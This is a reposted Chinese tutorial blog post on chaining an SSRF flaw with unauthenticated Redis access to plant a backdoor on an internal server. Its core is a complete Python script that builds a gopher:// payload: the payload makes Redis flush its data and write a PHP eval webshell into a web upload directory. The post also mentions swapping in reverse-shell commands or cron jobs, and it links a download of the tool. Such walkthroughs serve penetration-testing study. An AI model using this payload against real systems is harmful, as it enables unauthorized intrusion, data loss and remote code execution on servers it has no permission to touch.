目录

组合拳SSRF+redis未授权访问

目录

一、SSRF

二、redis未授权访问

三、组合利用

1.写入Webshell

2.反弹shell


一、SSRF

一台web服务器对其他服务器发起请求,以加载其他服务器的web内容或数据

但因请求参数没有进行严格过滤,攻击者可能会通过SSRF漏洞来访问敏感数据、执行未经授权的操作,或者将服务器用于发起攻击其他系统的请求。

二、redis未授权访问

redis数据库如果布置在公网,也就是0.0.0.0,并且没有设置密码,那攻击者可以直接访问redis数据库,通过redis数据库的持久化直接写入后门

如果是绑定在127.0.0.1上,我们直接访问是不行的,所以可以通过ssrf漏洞去访问本地的redis

三、组合利用

通过phpinfo可以发现ip为172.28.0.3,探测172.28.0.2服务器,发现存活

前面的步骤就不仔细讲了,主要是讲通过redis如何写入后门

发现ssrf后,利用bp爆破端口,可以发现6379端口返回了redis的报错信息,说明有redis未授权

那么我们可以直接写入后门,这时有三种方法

1.写入Webshell

这时我们可以在其web目录下通过redis写入后门,但发现不能直接在/var/www/html目录下面写

dirb爆破目录发现有upload目录,那可以写到upload目录下

通过Python脚本或者Gopher-master生成payload

python 复制代码
import urllib.parse

protocol = "gopher://"
ip = "172.22.0.2"  # 运行着redis的内网主机ip
port = "6379"
shell = "\n\n<?php eval($_GET[123]); ?>\n\n"
filename = "shell.php"
path = "/var/www/html/upload"
passwd = ""
cmd = ["flushall",
       "set 1 {}".format(shell.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
        cmd += CRLF
    return cmd

if __name__ == "__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
print(payload)

链接:https://pan.baidu.com/s/153ti5n69QI_CPhUta1WpbA?pwd=9peq

提取码:9peq

生成后还需要进行一次urlcode编码,因为生成出来的payload是gopher协议的url编码,所以我们放到浏览器中还需要进行一次urlcode编码

2.反弹shell

和写入Webshell一样,只是把system里面的语句换成反弹shell的语句就行

也可以写入计划任务

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
星鹿XINGLOO39 分钟前
ChatGPT语音功能在iPad上支持吗?全面解答!
人工智能·安全·ios·ai·chatgpt·语音识别·ipad
筱姌2 小时前
Spring Boot 整合 Redis 实现点赞功能:从基础到实践
spring boot·redis·后端
小昭dedug3 小时前
什么是车规级MCU?STM32也能上车规级场景?
安全
Andy3223 小时前
027 期 数据安全新招!你的数据守护神来了?
安全·github
江畔独步4 小时前
Redis清空缓存
数据库·redis·缓存
Pasregret4 小时前
07-云原生安全深度剖析:从 Kubernetes 集群防护到微服务安全加固
安全·云原生·kubernetes
红云梦4 小时前
高并发三剑客-本地缓存之王Caffeine-01缓存应用
java·redis·缓存
Suckerbin5 小时前
Pikachu靶场——Cross-Site Scripting
学习·安全·网络安全
云逸_5 小时前
在 Redis Lua 脚本中,keyCount 参数的作用是明确区分脚本参数中的 KEYS 和 ARGV,具体关系如下:
redis
Dola_Zou6 小时前
在多系统环境中实现授权闭环,Tetra Pak 借助CodeMeter打造食品工业的安全自动化体系
安全·自动化·软件工程·软件加密